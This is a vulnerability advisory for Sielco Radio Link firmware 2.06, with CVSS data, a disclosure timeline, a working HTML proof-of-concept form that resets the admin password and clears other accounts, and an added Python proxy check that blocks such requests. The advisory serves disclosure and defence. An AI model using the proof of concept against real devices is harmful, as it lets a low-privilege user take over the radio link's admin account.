Source: zeroscience | Author: Gjoko Krstic | ID: ZSL-2023-5760
Published: Mar 30, 2023

Sielco Radio Link 2.06 Improper Access Control Change Admin Password

CVSS3: 6.5
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: HIGH
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
AI Score: 6.9 (Confidence: High)
EPSS: 0.001 (Percentile: 18.6%)

Title: Sielco Radio Link 2.06 Improper Access Control Change Admin Password
Advisory ID: ZSL-2023-5760
Type: Local/Remote
Impact: Security Bypass
Risk: (4/5)
Release Date: 30.03.2023

Summary

Sielco develops and produces radio links for all transmission and reception needs, thanks to innovative units and excellent performances, accompanied by a high reliability and low consumption.

Description

The application suffers from improper access control when editing users. A user with Read permissions can send a single HTTP POST request with modified parameters to change other users’ names, passwords and permissions, including the admin password.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.06 (RTX19)
2.05 (RTX19)
2.00 (EXC19)
1.60 (RTX19)
1.59 (RTX19)
1.55 (EXC19)

Tested On

lwIP/2.1.1
Web/2.9.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[29.03.2023] No response from the vendor.
[29.03.2023] No response from the CSIRT team.
[30.03.2023] Public security advisory released.

PoC

sielco_rl_iac.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/171847/>
[2] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08>
[3] <https://vulners.com/cve/CVE-2023-45228>
[4] <https://nvd.nist.gov/vuln/detail/CVE-2023-45228>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253070>
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269708>

Changelog

[30.03.2023] - Initial release
[03.11.2023] - Added reference [1], [2], [3], [4], [5] and [6]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--


Sielco Radio Link 2.06 Improper Access Control Change Admin Password


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.06 (RTX19)
                  2.05 (RTX19)
                  2.00 (EXC19)
                  1.60 (RTX19)
                  1.59 (RTX19)
                  1.55 (EXC19)

Summary: Sielco develops and produces radio links for all transmission
and reception needs, thanks to innovative units and excellent performances,
accompanied by a high reliability and low consumption.

Desc: The application suffers from improper access control when editing
users. A user with Read permissions can manipulate users, passwords and
permissions by sending a single HTTP POST request with modified parameters
and edit other users' names, passwords and permissions including admin
password.

Tested on: lwIP/2.1.1
           Web/2.9.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5760
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5760.php


26.01.2023

--><html>
<body>
<form action="http://radiolink/protect/users_rx.htm" method="POST">
<input name="pwd0" type="hidden" value="Ch4nged12"/> <!-- This will set/modify admin pwd -->
<input name="pwd0bis" type="hidden" value="Ch4nged12"/> <!-- This will set/modify admin pwd -->
<input name="user1" type="hidden" value=""/> <!-- This will set/modify user1 -->
<input name="pwd1" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="pwd1bis" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="auth1" type="hidden" value="0"/> <!-- This will set user1 read perm -->
<input name="user2" type="hidden" value=""/> <!-- This will set/modify user2 -->
<input name="pwd2" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="pwd2bis" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="auth2" type="hidden" value="0"/> <!-- This will set user2 read perm -->
<input name="user3" type="hidden" value=""/> <!-- This will set/modify user3 -->
<input name="pwd3" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="pwd3bis" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="auth3" type="hidden" value="0"/> <!-- This will set user3 read perm -->
<input type="submit" value="Modify admin pwd, delete all users"/>
</form>
</body>
</html>
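
An added example, not part of the advisory or of the vendor's firmware: since the vendor status above lists no response, this sketches a compensating check for a reverse proxy placed in front of the device, letting only operator-listed administrators submit the account fields that the PoC form posts to /protect/users_rx.htm. The function names, the `admins` allowlist and the premise that the proxy knows the authenticated user name are assumptions; the sample body is constructed.

```python
import re
from urllib.parse import parse_qs

USERS_PATH = "/protect/users_rx.htm"  # form target shown in the PoC on this page
# Account-table fields seen in the PoC: pwd0, pwd0bis, user1, pwd1, pwd1bis, auth1, ...
ACCOUNT_FIELD = re.compile(r"(?:user|pwd|auth)(\d)(?:bis)?")


def account_slots(body):
    """Map each account slot (0 = admin) to the form fields that touch it."""
    slots = {}
    for name in parse_qs(body, keep_blank_values=True):
        match = ACCOUNT_FIELD.fullmatch(name)
        if match:
            slots.setdefault(int(match.group(1)), []).append(name)
    return {slot: sorted(names) for slot, names in slots.items()}


def review_request(method, path, body, auth_user, admins):
    """Return (verdict, reason) for one proxied request.

    auth_user is the name the proxy authenticated (assumption); admins is an
    operator-maintained allowlist kept on the proxy, not on the device.
    """
    if method.upper() != "POST" or path.split("?", 1)[0].lower() != USERS_PATH:
        return ("allow", "not a write to the user table")
    slots = account_slots(body)
    if not slots:
        return ("allow", "no account fields in body")
    if auth_user in admins:
        return ("allow", "account edit by listed administrator")
    touched = ", ".join(str(s) for s in sorted(slots))
    return ("block", f"{auth_user!r} is not an administrator but edits slot(s) {touched}")


# Constructed sample body using the field names from the PoC form.
SAMPLE_BODY = "pwd0=Example1&pwd0bis=Example1&user1=&pwd1=&pwd1bis=&auth1=0"

if __name__ == "__main__":
    for user in ("viewer", "admin"):
        print(user, review_request("POST", USERS_PATH, SAMPLE_BODY, user, {"admin"}))
```

The check only protects traffic that passes through the proxy, so direct network access to the device's web interface has to be closed off separately.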
